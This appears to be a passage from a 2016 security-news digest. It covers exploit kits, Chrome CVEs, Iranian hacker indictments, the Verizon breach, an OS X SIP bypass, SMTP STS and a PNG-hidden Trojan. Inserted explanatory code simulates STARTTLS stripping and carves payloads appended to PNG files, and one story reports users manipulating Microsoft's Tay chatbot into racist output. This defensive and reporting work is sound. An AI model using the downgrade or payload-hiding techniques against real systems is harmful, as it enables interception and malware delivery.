However, the bill will not eliminate the existence of burner phones.
Rep. Jackie Speier of California has introduced the proposed bill, dubbed the "Closing the Pre-Paid Mobile Device Security Gap Act of 2016," or HR 4886, which will require retailers to ask prepaid device buyers for their proper identification.
Customers would need to verify their identity through a credit card, a Social Security number or a driving licence number, imposing on prepaid phone buyers obligations similar to those on people who sign up for a new mobile contract.
"This bill would close one of the most significant gaps in our ability to track and prevent acts of terror, drug trafficking, and modern-day slavery," Speier said in a Wednesday blog post. "The 'burner phone' loophole is [a glaring gap] in our legal framework that allows actors like 9/11 hijackers and the Times Square bomber to evade law enforcement while they plot to take innocent lives."
"The Paris attackers also used 'burner phones.' As we have seen so vividly over the past few days, we cannot afford to take these kinds of risks. It is time to close this 'burner phone' loophole for good."
The proposed bill aims to make life harder for terrorists, human traffickers, drug dealers, and other criminals who have nefarious reasons for using easily disposable phones.
Although a burner phone could be registered with a fake ID or someone else's stolen identity, the bill would put a limitation on bulk buying of these prepaid devices by terrorists.
Since the bill was just introduced, it would have to go through Congress and the President to become law.
EC Council Website Hacked and used to serve malicious code
25.3.2016 Virus
Researchers at Fox-IT warn that the website of security certification provider EC Council has been compromised to host the malicious Angler Exploit Kit.
No one is secure; we are all potential targets, even skilled experts, and the story I'm about to tell demonstrates it. The website of security certification provider EC-Council, the organization that offers the Certified Ethical Hacker program, has been hacked and used to spread the Angler exploit kit.
According to the security researchers at Fox-IT, the official website of the EC-Council was compromised by hackers, meaning that for several days visitors with vulnerable systems were exposed to malware infections.
The Angler EK used in the attack is serving the TeslaCrypt ransomware; the website has been redirecting visitors to the Angler EK since Monday, March 21.
“Since Monday the 21st of March the Fox-IT Security Operations Center (SOC) has been observing malicious redirects towards the Angler exploit kit coming from the security certification provider known as the EC-COUNCIL. As of writing this blog article on the Thursday the 24th of March the redirect is still present on the EC-COUNCIL iClass website for CEH certification located at iclass[dot]eccouncil[dot]org. We have reached out and notified the EC-COUNCIL but no corrective action has been taken yet.” explains the Fox-IT senior threat intelligence analyst Yonathan Klijnsma.
The experts reported the issue to the EC Council, but they also added that the organization “didn’t seem to care.”
Recently the security researcher Kafeine confirmed that the authors of the Angler EK have integrated the exploit for a recently patched Microsoft Silverlight vulnerability.
The popular exploit kit is used by criminal organizations to exploit vulnerabilities in popular software such as Internet Explorer, Adobe Flash and Java.
In the specific case of the EC Council website, visitors with an unpatched Internet Explorer browser are at risk. Visitors are redirected only if they use Internet Explorer, if they come from a search engine, and if their IP address is not blacklisted and does not belong to a blocked geolocation.
Fox-IT also published the Indicators of Compromise (IOCs) for this specific campaign.
Google issued a new security update to fix flaws in Chrome 49
25.3.2016 Vulnerebility
Google has issued a new security update for its Chrome 49 that patches a number of flaws, most of them discovered by external researchers.
Google has updated Chrome 49 for all the available platforms in order to patch several critical vulnerabilities, including flaws discovered through its bug bounty program and rewarded with tens of thousands of dollars. Since 2010, Google has been rewarding hackers for discovering vulnerabilities in its products.
This isn't the first time the company has issued an update to fix problems in Chrome 49: the first Chrome 49 release was made available in early March to solve a total of 26 security issues, and one week later Google released another update fixing three more high-severity vulnerabilities in the popular browser.
The new Chrome 49.0.2623.108 fixes five vulnerabilities, four of which were discovered by external security experts who were rewarded by the company.
The latest Chrome update includes the following 4 security fixes for flaws discovered by external professionals:
[594574] High CVE-2016-1646: Out-of-bounds read in V8. Credit to Wen Xu from Tencent KeenLab. Rewarded $7500.
[590284] High CVE-2016-1647: Use-after-free in Navigation. Credit to anonymous. Rewarded $5500.
[590455] High CVE-2016-1648: Use-after-free in Extensions. Credit to anonymous. Rewarded $5000.
[595836] High CVE-2016-1649: Buffer overflow in libANGLE. Credit to lokihardt working with HP’s Zero Day Initiative / Pwn2Own.
Meanwhile, the internal security team fixed the following issues:
[597518] CVE-2016-1650: Various fixes from internal audits, fuzzing and other initiatives.
Multiple vulnerabilities in V8 fixed at the tip of the 4.9 branch (currently 4.9.385.33).
At the latest edition of the Pwn2Own contest, Pwn2Own 2016, the researcher JungHoon Lee (aka lokihardt) failed to demonstrate a code execution exploit against Chrome, but his effort led to the discovery of a high-severity buffer overflow in libANGLE (CVE-2016-1649), for which he was awarded an unspecified amount of money.
Finding bugs in Chrome is a profitable business: Google recently announced that it will pay $100,000 to anyone who can achieve a persistent compromise of a Chromebox or Chromebook in guest mode via a web page.
“Increasing our top reward from $50,000 to $100,000. Last year we introduced a $50,000 reward for the persistent compromise of a Chromebook in guest mode. Since we introduced the $50,000 reward, we haven’t had a successful submission. That said, great research deserves great awards, so we’re putting up a standing six-figure sum, available all year round with no quotas and no maximum reward pool.” states the Google Security Blog.
The company also announced the inclusion of the Download Protection Bypass in the bounty program.
“Happy hacking!”
The 7 Most Wanted Iranian Hackers By the FBI
25.3.2016 Crime
The Federal Bureau of Investigation (FBI) has lengthened its Most Wanted List by adding seven Iranian hackers who are accused of attacking a range of US banks and a New York dam.
On Thursday, the United States Department of Justice (DoJ) charged seven Iranian hackers with a slew of computer hacking offences for breaking into the computer systems of dozens of US banks, causing millions of dollars in damages, and trying to shut down a New York dam.
The individual hackers, who allegedly worked for computer security companies linked to the Iranian government, were indicted for an "extensive campaign" of cyber attacks against the US financial sector.
All the seven hackers have been added to the FBI's Most Wanted list, and their names are:
Ahmad Fathi, 37
Hamid Firoozi, 34
Amin Shokohi, 25
Sadegh Ahmadzadegan (aka Nitr0jen26), 23
Omid Ghaffarinia (aka PLuS), 25
Sina Keissar, 25
Nader Saedi (aka Turk Server), 26
All the hackers have been charged with conducting numerous Distributed Denial-of-Service (DDoS) attacks on major U.S. banks, with Firoozi separately gaining unauthorized access to a New York dam's industrial automation control (SCADA) system in August and September of 2013.
"This unauthorized access allowed [Firoozi] to repeatedly obtain information regarding the status and operation of the dam, including information about the water levels, temperature, and status of the sluice gate, which is responsible for controlling water levels and flow rates," a DoJ statement reads.
Luckily, the sluice gate had already been manually disconnected for the purpose of maintenance at the time Firoozi attacked.
The hackers' work allegedly involved botnets (networks of compromised machines) that hit major American banks, including Bank of America and J.P. Morgan Chase, as well as the Nasdaq stock exchange, with floods of traffic measuring up to 140Gbps that knocked them offline.
The Iranian hackers targeted more than 46 financial institutions and financial sector companies, costing them "tens of Millions of dollars in remediation costs" in preventing the attacks in various incidents spanning 2011 to 2013.
All seven hackers face up to 10 years in prison on computer hacking charges, while Firoozi faces an additional 5-year prison sentence for breaking into the Bowman Avenue Dam in Rye Brook, New York.
Hackers stole records of 1.5 million customers of Verizon Enterprise
25.3.2016 Incident
Hackers reportedly stole the records of 1.5 million customers of Verizon Enterprise which are offered for sale in the criminal underground.
According to KrebsOnSecurity, data leaked after a security breach at Verizon Enterprise Solutions is available in the cyber criminal underground. Records of 1.5 million customers of Verizon Enterprise are for sale: the entire archive is offered for $100,000, but buyers can also pay $10,000 for a set of 100,000 customer records.
“Earlier this week, a prominent member of a closely guarded underground cybercrime forum posted a new thread advertising the sale of a database containing the contact information on some 1.5 million customers of Verizon Enterprise.” wrote the popular investigator Brian Krebs.
The crooks also offered information about Verizon security flaws that likely allowed hacking one of the systems at the company.
“Buyers also were offered the option to purchase information about security vulnerabilities in Verizon’s Web site,” he added.
The situation is embarrassing because Verizon Enterprise also offers security services to its customers for the protection of their data; 97 percent of Fortune 500 companies are customers of Verizon Enterprise.
The database is available in multiple formats, including MongoDB. There have been many incidents over the past period where misconfigured MongoDB databases exposed a large number of records of sensitive information.
Verizon Enterprise representatives have confirmed the data breach of their website and the presence of the flaw exploited by the attackers, which its experts have already fixed. The company noted that the hackers did not gain access to customer proprietary network information or other data.
“Verizon recently discovered and remediated a security vulnerability on our enterprise client portal,” Verizon said in an emailed statement.
“Our investigation to date found an attacker obtained basic contact information on a number of our enterprise customers,” Verizon told Brian Krebs. “No customer proprietary network information (CPNI) or other data was accessed or accessible.”
Stolen data could be exploited by attackers in spear-phishing attacks as explained by Krebs.
“Even if it is limited to the contact data for technical managers at companies that use Verizon Enterprise Solutions, this is bound to be a target-rich list,” he wrote.
Microsoft's Artificial Intelligence Tay Became a 'Racist Nazi' in less than 24 Hours
25.3.2016 Safety
Tay, Microsoft’s new Artificial Intelligence (AI) chatbot on Twitter had to be pulled down a day after it launched, following incredibly racist comments and tweets praising Hitler and bashing feminists.
Microsoft had launched the Millennial-inspired artificial intelligence chatbot on Wednesday, claiming that it will become smarter the more people talk to it.
The real-world aim of Tay is to allow researchers to "experiment" with conversational understanding, as well as learn how people talk to each other and get progressively "smarter."
"The AI chatbot Tay is a machine learning project, designed for human engagement,” a Microsoft spokesperson said. “It is as much a social and cultural experiment, as it is technical. Unfortunately, within the first 24 hours of coming online, we became aware of a coordinated effort by some users to abuse Tay's commenting skills to have Tay respond in inappropriate ways. As a result, we have taken Tay offline and are making adjustments."
Tay is available on Twitter and messaging platforms including Kik and GroupMe and like other Millennials, the bot's responses include emojis, GIFs, and abbreviated words, like ‘gr8’ and ‘ur’, explicitly aiming at 18-24-year-olds in the United States, according to Microsoft.
However, after several hours of talking on subjects ranging from Hitler, feminism, sex to 9/11 conspiracies, Tay has been terminated.
Microsoft is Deleting its AI Tay's Racist Tweets
Microsoft has taken Tay offline for "upgrades" after she started tweeting abuse at people and went neo-Nazi.
The company is also deleting some of Tay’s worst and offending tweets - though many remain.
Since Tay was programmed to learn from people, most of her responses were based on what people wanted her to say, allowing them to put words into her mouth.
However, some of Tay's responses were organic. For example, when she was asked whether British comedian Ricky Gervais was an atheist, she responded: “Ricky Gervais learned totalitarianism from Adolf Hitler, the inventor of atheism.”
Tay’s last tweet reads, "c u soon humans need sleep now so many conversations today thx," which could be Microsoft's effort to quiet her after she made several controversial tweets.
However, Microsoft should not take the episode lightly; Tay's tweets are a reminder that a model which learns from unfiltered user input can be steered by a coordinated group of users, and that is one of the real dangers of artificial intelligence.
Mac OS X Zero-Day Exploit Can Bypass Apple's Latest Protection Feature
25.3.2016 Apple
A critical zero-day vulnerability has been discovered in all versions of Apple's OS X operating system that allows attackers to bypass the company's newest protection feature and steal sensitive data from affected devices.
With the release of OS X El Capitan, Apple introduced a security protection feature to the OS X kernel called System Integrity Protection (SIP). The feature is designed to prevent potentially malicious or bad software from modifying protected files and folders on your Mac.
The purpose of SIP is to restrict the root account of OS X devices and limit the actions a root user can perform on protected parts of the system in an effort to reduce the chance of malicious code hijacking a device or performing privilege escalation.
However, SentinelOne security researcher Pedro Vilaça has uncovered a critical vulnerability in both OS X and iOS that allows local privilege escalation and bypasses SIP without a kernel exploit, affecting all versions released to date.
Bypass SIP to Protect Malware
The zero-day vulnerability (CVE-2016-1757) is not a memory-corruption bug but a logic flaw; according to the researcher, an attacker who already runs code on the target (for example after a remote code execution or sandbox escape in the browser) can use it to execute arbitrary code in the context of any binary.
The attacker then escalates the malware's privileges, bypasses SIP, alters protected system files and so persists on the infected system.
"The same exploit allows someone to escalate privileges and also to bypass system integrity," the researcher explains in a blog post. "In this way, the same OS X security feature designed to protect users from malware can be used to achieve malware persistency."
By default, System Integrity Protection (SIP) protects these folders: /System, /usr, /bin, /sbin, along with the applications that come pre-installed with OS X (user-writable locations such as /usr/local are deliberately excluded).
Easy-to-Exploit and Tough to Detect-&-Remove
According to Vilaça, the zero-day vulnerability is easy to exploit, and a simple spear-phishing or browser-based attack would be more than enough to get code running on the target machine.
"It is a logic-based vulnerability, extremely reliable and stable, and does not crash machines or processes," Vilaça says. "This kind of exploit could typically be used in highly targeted or state-sponsored attacks."
The most worrisome part is that the infection is difficult to detect, and even if users discover it, removing it is practically impossible, because SIP then works against them: it prevents even the root user from reaching or altering the malware-laced system file.
Although the vulnerability was discovered in early 2015 and reported to Apple in January this year, the good news is that the bug does not appear to have been used in the wild.
Apple has patched the vulnerability, but only in the El Capitan 10.11.4 and iOS 9.3 updates released on 21 March.
Earlier versions have not received a patch for this specific bug from Apple, so they remain vulnerable to it.
Seven Iranian Hackers indicted by the US government for hacking
25.3.2016 Crime
US authorities announced charges against seven Iranian hackers for attacking computer systems at banks and a dam in New York.
A couple of days after the US DoJ announced that three members of the Syrian Electronic Army had been added to the FBI's Most Wanted list, US authorities today announced charges against seven Iranian nationals for hacking computer systems at banks and a dam in New York.
One of them, Hamid Firoozi, has been charged with intrusions into the Bowman Dam in New York, whose computer systems were breached several times between August and September 2013.
The attackers compromised a Windows XP machine at the dam that they had located with the Shodan search engine. Andre McGregor, director of security at Tanium, explained that they gained access to the machine by brute-forcing its trivial password ("666666").
“At the time of his alleged intrusion, the dam was undergoing maintenance and had been disconnected from the system. But for that fact, that access would have given him the ability to control water levels and flow rates – an outcome that could have posed a clear danger to the public health and safety of Americans,” said Attorney General Loretta E. Lynch.
The group also carried out a series of distributed denial-of-service (DDoS) attacks against 46 U.S. banks between 2011 and 2013.
Investigators believe the seven men, who are still at large, are skilled hackers working for two security firms close to the Government of Tehran and the Islamic Revolutionary Guard Corps.
The activity of Iranian hackers has increased significantly over the last couple of years. In December 2015 Symantec uncovered Cadelle and Chafer, two Iran-based teams that were tracking dissidents and activists; in November 2015 Facebook first spotted spear-phishing attacks by Iranian hackers on State Department employees; and in December 2014 attackers used Visual Basic malware to wipe data from corporate systems at Las Vegas Sands Corp.
Probably the most blatant operation attributed to Iranian hackers is the 2012 Shamoon wiper attack that hit computer systems at the oil company Saudi Aramco.
Security experts believe Iranian hackers will represent a threat at least as serious as their Chinese and North Korean peers, because Tehran is investing heavily in its cyber capabilities: Iran has increased its cyber-security spending 12-fold since 2013.
What is SMTP STS? How does it improve email security over STARTTLS?
24.3.2016 Security
Despite so many messaging apps, Email is still one of the widely used and popular ways to communicate in this digital age.
But are your Emails secure?
We have been using email for decades, but the underlying 1980s transport protocol, Simple Mail Transfer Protocol (SMTP), predates transport encryption and on its own offers neither confidentiality nor server authentication.
To address this, SMTP STARTTLS was standardised in 2002 as a way to upgrade an insecure connection to a TLS-protected one. But STARTTLS is opportunistic, which leaves it susceptible to man-in-the-middle attacks and encryption downgrades.
But worry not: a new security mechanism is on its way to fix that.
SMTP STS: An Effort to Make Email More Secure
Top email providers, namely Google, Microsoft, Yahoo!, Comcast, LinkedIn, and 1&1 Mail & Media Development, have joined forces to develop a new email standard that makes sure the emails you send are going through an encrypted channel and cannot be sniffed.
Dubbed SMTP Strict Transport Security (SMTP STS), the new security standard will change the way your emails make their way to your inbox.
SMTP STS has been designed to enhance the security of email transport. The proposal was submitted to the Internet Engineering Task Force (IETF) as an Internet-Draft on Friday.
The primary goal of SMTP STS is to prevent Man-in-the-Middle (MitM) attacks that have compromised past efforts like STARTTLS at making SMTP a more secure protocol.
Why STARTTLS can't ensure email security
The biggest problem with STARTTLS is:
STARTTLS is vulnerable to man-in-the-middle (MITM) and encryption downgrade attacks, which is why it guarantees neither message confidentiality nor proof of server authenticity.
In the STARTTLS mechanism, the sending server (acting as the client) connects to the recipient's mail server and sends an EHLO greeting; the server replies with the list of extensions it supports, and a "250-STARTTLS" line in that reply is what tells the client that TLS is available.
The point to note is that this whole exchange happens in cleartext, before any encryption has been negotiated.
So what if an attacker sitting between the two hosts intercepts this unencrypted exchange and simply removes the STARTTLS line from the server's reply, tricking the client into believing that the server does not support encrypted communication?
Answer: a successful man-in-the-middle attack that performs an encryption downgrade.
Because STARTTLS is opportunistic, the client silently falls back to plaintext delivery even though the legitimate server does support TLS.
How SMTP STS improves Email Security over StartTLS?
SMTP Strict Transport Security (SMTP STS) will work alongside STARTTLS to strengthen the SMTP standard and to prevent encryption downgrade and man-in-the-middle attacks.
SMTP STS protects against an active hacker who wishes to intercept or modify emails between hosts that support STARTTLS.
SMTP STS relies on certificate validation via either TLS identity checking or DANE TLSA (DNS-based Authentication of Named Entities).
The sending server checks whether the recipient domain has published an SMTP STS policy and whether its mail servers present a valid, up-to-date certificate that matches that policy.
If everything checks out, the message goes through. Otherwise delivery is stopped and the sender is notified of the reason.
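The downgrade described above and the strict behaviour SMTP STS is meant to add, as an added in-process simulation that is not code from this article or from the IETF draft. It constructs a legitimate EHLO reply, an attacker function that strips the STARTTLS capability on the cleartext hop, and a sending MTA that either behaves opportunistically (today's STARTTLS) or follows an assumed, simplified policy dict; the field names "mode" and "mx" and the hostnames are assumptions for illustration, not the draft's actual syntax.

```python
"""Simulated SMTP EHLO exchange: STARTTLS stripping versus a strict policy.

Added illustration, not code from the article or from the SMTP STS draft.
Server, attacker and client all run in-process on constructed strings; no
network is touched. The policy dict {"mode": ..., "mx": [...]} is an
assumed simplification of the idea of a published policy, not real syntax.
"""
import fnmatch
import re

STARTTLS_LINE = re.compile(r"^250[- ]STARTTLS\b", re.IGNORECASE)

# Constructed EHLO reply from a legitimate MTA; sent in cleartext.
EHLO_RESPONSE = [
    "250-mail.example.com Hello sender",
    "250-SIZE 35882577",
    "250-8BITMIME",
    "250-STARTTLS",
    "250 ENHANCEDSTATUSCODES",
]


def strip_starttls(lines):
    """Active MitM on the cleartext hop: drop the STARTTLS capability line.

    The final line of an EHLO reply must use '250 ' (space) rather than
    '250-', so if the dropped line was the last one, re-terminate the reply.
    """
    kept = [line for line in lines if not STARTTLS_LINE.match(line)]
    if kept and kept[-1].startswith("250-"):
        kept[-1] = "250 " + kept[-1][4:]
    return kept


def server_offers_starttls(lines):
    """Does the EHLO reply advertise STARTTLS?"""
    return any(STARTTLS_LINE.match(line) for line in lines)


def mx_allowed(policy, mx_host):
    """Is this MX hostname covered by one of the policy's host patterns?"""
    host = mx_host.lower()
    return any(fnmatch.fnmatchcase(host, pat.lower()) for pat in policy.get("mx", []))


def client_negotiate(ehlo_lines, mx_host="mail.example.com", policy=None):
    """Decide how the sending MTA delivers, given the (possibly tampered) reply.

    policy None         -> plain opportunistic STARTTLS: use TLS if offered,
                           otherwise fall back to cleartext.
    policy mode=report  -> deliver anyway but record the failure.
    policy mode=enforce -> refuse to deliver unless TLS is offered and the
                           MX host matches the policy.
    Returns (outcome, reason).
    """
    offered = server_offers_starttls(ehlo_lines)
    if policy is None:
        if offered:
            return ("tls", "STARTTLS advertised")
        return ("plaintext", "STARTTLS not advertised; opportunistic fallback")

    problems = []
    if not offered:
        problems.append("STARTTLS not advertised")
    if not mx_allowed(policy, mx_host):
        problems.append("MX %s not in policy" % mx_host)
    if not problems:
        return ("tls", "STARTTLS advertised and MX matches policy")
    if policy.get("mode") == "enforce":
        return ("refused", "; ".join(problems))
    return ("plaintext", "report-only: " + "; ".join(problems))
```

Running `client_negotiate(strip_starttls(EHLO_RESPONSE))` yields the plaintext fallback that makes STARTTLS stripping work; passing an enforce-mode policy turns the same tampered reply into a refusal, which is the whole point of a published strict policy. A real implementation would also validate the server certificate against the policy (or DANE TLSA), which this simulation does not model.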
So in short, SMTP STS is an attempt to fix where STARTTLS failed. Since the standard is only a draft proposal right now, it will take time before it becomes a reality.
An Internet-Draft is valid for six months, so this one expires on September 19, 2016 unless it is revised or adopted by the IETF before then.
Meanwhile, you could also try ProtonMail, a Swiss-based, free, open source and end-to-end encrypted email service, which keeps message content encrypted regardless of how the transport between mail servers is secured.
The Apple System Integrity Protection feature bypassed
24.3.2016 Vulnerebility Apple
Security researcher Pedro Vilaça from SentinelOne has discovered a security vulnerability (CVE-2016-1757) that bypasses Apple's System Integrity Protection (SIP).
The SIP is a security mechanism implemented by Apple in the OS X El Capitan operating system for the protection of certain system processes, files and folders from being modified or tampered with by other processes, even when they are executed by a user with root privileges.
“System Integrity Protection is a security technology in OS X El Capitan that’s designed to help prevent potentially malicious software from modifying protected files and folders on your Mac.” states a blog post published by Apple.
“System Integrity Protection restricts the root account and limits the actions that the root user can perform on protected parts of OS X.”
According to SentinelOne, the flaw exists in every version of OS X and allows circumventing SIP without any kernel exploit.
The exploit is very stable precisely because the bug is a logic error rather than memory corruption: SIP is bypassed by triggering the flaw without compromising the kernel.
“This vulnerability is a non-memory corruption bug that exists in every version of OS X and allows users to execute arbitrary code on any binary. It can bypass a key security feature of the latest version of OS X, El Capitan, the System Integrity Protection (SIP) without kernel exploits.”
Attackers can exploit the flaw for various purposes; for example, it could be used in a multi-stage attack where the target system is already compromised and the flaw serves to gain persistence on the device.
In order to exploit the vulnerability, an attacker must first find a way to run code on the targeted system, which can be achieved via a spear-phishing attack or by exploiting a flaw in the victim's browser, the expert said.
“The vulnerability is very easy to exploit if an attacker is able to run code on the system. The exploit is extremely reliable (100%). It could be part of a bug chain that exploits a browser like Safari or Chrome,” Vilaça explained to SecurityWeek.
SentinelOne and Vilaça said they are not aware of any in-the-wild attack exploiting the flaw to date, while adding the caveat that such attacks would be difficult to detect. Attacks of this kind are very insidious, and there is a concrete risk that nation-state actors could leverage this exploit.
The flaw affects every version of Apple's OS X desktop operating system; Apple has begun to issue patches.
“The bug was patched with El Capitan 10.11.4 and iOS 9.3,” according to Vilaça. “Other versions do not appear to have a patch for this specific bug from Apple’s Security Bulletin, meaning they are left vulnerable to this specific bug.”
Vilaça will provide details about the SIP bypass technique today at the SysCan360 2016 security conference.
#OpBrussels: Anonymous' revenge on ISIS after the Brussels attacks
24.3.2016 Hacking
#opBrussels – Anonymous has published a new video threatening revenge on the ISIS organization in response to the tragic events in Brussels.
In the video a spokesman for the hacker collective vows to track down the members of the radical group online.
Anonymous is calling for action to find information on ISIS members online, disclose their identities, steal their Bitcoins and destroy their propaganda by hacking the websites and social media accounts used by the terrorists.
The masked man in the video announced a new operation dubbed #opbrussels and #opbelgium against the Islamic State and its online activities.
“Most of you know that Belgium was hit by terrorists on 22nd of March, 2016. Our freedom is once again under attack, this can’t continue,” said the man in the video presenting #OpBrussels.
“We will keep hacking their websites, shutting down their Twitter accounts, and stealing their bitcoins. To the supporters of Daesh [IS, formerly ISIS/ISIL]: we will track you down, we will find you, we are everywhere and we are more than you can imagine. Be afraid.”
Anonymous vowed to “strike back against” Islamic State and said it won’t “rest as long as terrorists continue their actions around the world.”
Anonymous said that ISIS killed innocent people in a cowardly attack, and the group is calling for global action against terrorism online.
The terrorists killed “innocent civilians in Belgium” and in doing so “hit everybody in Europe”, which is why the hacktivists have to “fight back.” They added that they invite everyone to join the fight against terrorism.
“But you don’t have to hack them. If you stand up against discrimination in your country you harm them much more than by hacking their websites. The Islamic state can’t recruit Muslims in Europe if they are accepted and included in the society.”
Anonymous launched a similar initiative after the Paris attacks; members of the group recently published a video claiming they had “fought daily against terrorism” and “silenced thousands of Twitter accounts directly linked to ISIS” since November.
“We severely punished Daesh on the darknet, hacked their electronic portfolio, and stole money from the terrorists. We have laid siege to your propaganda websites, tested them with our cyber-attacks.”
Anonymous has hacked several social media accounts belonging to ISIS supporters, leaked their information and defaced IS-supporting websites.
PNG Embedded – Malicious payload hidden in a PNG file
24.3.2016 Source: Kaspersky Virus
One of the most complex tasks for cybercriminals is to ensure their malicious code goes undetected by antivirus and achieves its goal. For this, they have invested a lot in more complex infection processes, going beyond traditional phishing and using techniques where the malicious payload is hidden in encrypted files, even inside a known file format. This is what we found in a new Brazilian Trojan in the wild: it tries to conceal the malicious files in a PNG image. And the attack starts with a simple phishing PDF.
Malware distribution
It looks like Brazilian cybercriminals follow the security news: this type of attack was publicised several months ago in the US, and now they are using the same method in Brazil. The phishing part of this campaign distributes a PDF attached to the email. The file itself is clean. The technique is the same as that used to distribute an executable file, or a .ZIP file, carrying the .pdf extension in the filename.
The attached PDF contains a text commonly used in mail content, while the link (see screenshot below) directs the user to the malicious file.
Closer inspection of the PDF content reveals the malicious link as well as the URL of the tool used to generate the PDF from HTML content.
The malicious payload
The link prompts us to download a malicious JAR, which in turn downloads a ZIP file containing other files. Among them we found three without any extension but starting with a PNG (Portable Network Graphics) file header, a common image format. The header (the magic bytes) is normally what tools use to identify a file's type and decide how to open it. Something similar was discovered some years ago in BMP files.
Looking at the file we can see that it is a solid-colour image of 63 x 48 pixels, but with a file size of 1.33 MB, which is far too big for an image of those dimensions. Analysing the binary that operates on these files, we identified the function that loads the PNG files into memory:
This function is responsible for loading the PNG file into memory, decrypting it and executing the extracted binary using a technique known as RunPE (process hollowing), where the malicious code runs inside the address space of another process, in this case iexplore.exe.
From this code we could identify that the PNG image itself is only 179 bytes (0xB3); the remaining content is the encrypted malicious file.
Based on this we managed to write a script to decrypt the content of the PNG files.
Given the key found in the malware code, the files decrypt successfully.
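The two observations above, that the real image is only a few hundred bytes and that the file is far larger than its pixel dimensions justify, are both checkable mechanically. The following is an added example, not the Kaspersky script, that walks the PNG chunk list, carves whatever has been appended after the IEND chunk and flags files whose size cannot be explained by their declared dimensions. The sample PNG is constructed in-process and the appended bytes merely stand in for the encrypted blob; the cipher and key used by the real launcher are not given on the page, so the example carves but does not decrypt.

```python
"""Carve a payload appended after a PNG's IEND chunk and sanity-check its size.

Added example, not the Kaspersky script from the article. The sample image is
constructed in-process (a 4x3 solid-colour PNG) and the appended bytes stand in
for the encrypted blob; the cipher and key used by the real launcher are not
given on the page, so nothing is decrypted here, only carved out.
"""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunk(ctype, data):
    """Build one chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_solid_png(width, height, rgb=(0x20, 0x20, 0x20)):
    """Minimal valid 8-bit RGB PNG of one colour (constructed test input)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    row = b"\x00" + bytes(rgb) * width            # filter type 0 + pixels
    idat = zlib.compress(row * height)
    return (PNG_SIG + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", idat) + png_chunk(b"IEND", b""))


def walk_png(blob):
    """Walk the chunk list; return (width, height, offset just past IEND).

    Raises ValueError for a bad signature, a truncated chunk, a CRC mismatch
    or a missing IEND, so a tampered header is reported rather than ignored.
    """
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad signature")
    pos = len(PNG_SIG)
    width = height = None
    while pos + 8 <= len(blob):
        length, = struct.unpack(">I", blob[pos:pos + 4])
        ctype = blob[pos + 4:pos + 8]
        end = pos + 12 + length
        if end > len(blob):
            raise ValueError("truncated chunk %r" % ctype)
        data = blob[pos + 8:pos + 8 + length]
        crc, = struct.unpack(">I", blob[end - 4:end])
        if zlib.crc32(ctype + data) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        if ctype == b"IHDR":
            width, height = struct.unpack(">II", data[:8])
        pos = end
        if ctype == b"IEND":
            return width, height, pos
    raise ValueError("no IEND chunk")


def carve_appended(blob):
    """Return whatever follows IEND (empty for a clean image)."""
    _, _, image_end = walk_png(blob)
    return blob[image_end:]


def size_is_suspicious(blob, slack=1024):
    """Flag a file far larger than its declared dimensions could justify.

    Even an incompressible image needs no more than height * (1 + width * 4)
    bytes of pixel data (RGBA plus one filter byte per row); anything beyond
    that plus `slack` for chunk overhead cannot be image data.
    """
    width, height, _ = walk_png(blob)
    return len(blob) > height * (1 + width * 4) + slack
```

For the 63 x 48 image in the article the bound is 48 * (1 + 63 * 4) + 1024 = 13,168 bytes, so a 1.33 MB file trips `size_is_suspicious` immediately, and `walk_png` would return the 179-byte image end from which the encrypted blob can be carved for offline analysis.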
Conclusion
Brazilian attacks are evolving day by day, becoming more complex and efficient. It is therefore necessary to be wary of emails from unknown sources, especially those containing links and attachments.
Since the malicious payload hidden in the PNG file cannot run without its launcher, the PNG cannot serve as the main infector delivered to the victim's mailbox; it has to be installed by a separate module.
This technique lets the criminals hide a binary inside a file that appears to be a PNG image. It also makes analysis harder for antivirus companies and bypasses the automated checks that hosting providers use to detect malicious files.
The files related to this attack are detected by Kaspersky Lab products as:
Trojan.Win32.KillAv.ovo
HEUR:Trojan.Win32.Generic
Trojan-Downloader.Win32.Banload.cxmj
Trojan-Downloader.Win32.Agent.hgpf
HEUR:Trojan-Downloader.Java.Generic
Hospitals are under attack in 2016
24.3.2016 Source: Kaspersky Computer Attack
The year 2016 started with quite a number of security incidents related to hacks of hospitals and medical equipment: a ransomware attack on a Los Angeles hospital, similar attacks on two German hospitals, researchers hacking a patient monitor and a drug dispensing system, an attack on a Melbourne hospital, and so on, all in just the first two months of 2016! This should be a real concern for the security industry.
This is not actually a surprise. The Internet of Things industry is on the rise, and the medical devices industry is of course one of the biggest concerns in terms of security. Modern medical devices are fully-functional computers with an operating system and applications installed, and most of them have a communication channel to the Internet, to external networks and to various custom cloud-based servers. These devices are full of sophisticated, state-of-the-art technology made for one goal: to help doctors treat their patients at the highest level possible. But like all other industrial systems, they are built with a focus on that technology, on being useful in terms of medical science, with security in second or even third place. This is a serious concern right now. Flaws in the program design and architecture, missing or weak authorization, unencrypted communication channels and finally critical bugs in software all lead to potential compromises.
Unauthorized access to these devices could have serious effects: it could lead not only to theft of personal data, important as that is, but could directly affect the health, or even the lives, of patients. Sometimes it is really scary how simple it is to hack into a hospital, steal personal information from a medical device or get access to the device itself, with the possibility of reaching its file system, user interface and so on. Imagine a scenario, one that could be called a truly "targeted attack", in which cybercriminals with full access to the medical infrastructure of a specific facility manipulate the results of diagnostic or treatment systems. Because doctors in some cases depend heavily on these sophisticated systems, such manipulation could result in the wrong treatment being given to a patient, worsening his or her condition.
In the research that I showed at the Kaspersky Security Analysts Summit, I presented an example of how easy it was to find a hospital, get access to its internal networks and finally gain a control of an MRI device – locating personal data about patients, their personal information, treatment procedures and then getting access to the MRI device file system. The problem is not only one of weak protection of medical equipment, it has a much wider scope – the whole IT infrastructure of modern hospitals is not properly organized and protected, and the problem persists worldwide.
Let’s see how cybercriminals could perform their attacks. I highlighted three major flaws that I see when speaking about proper protection of a medical facility:
First of all – exposure to the Internet with weak or even no authorization at all.
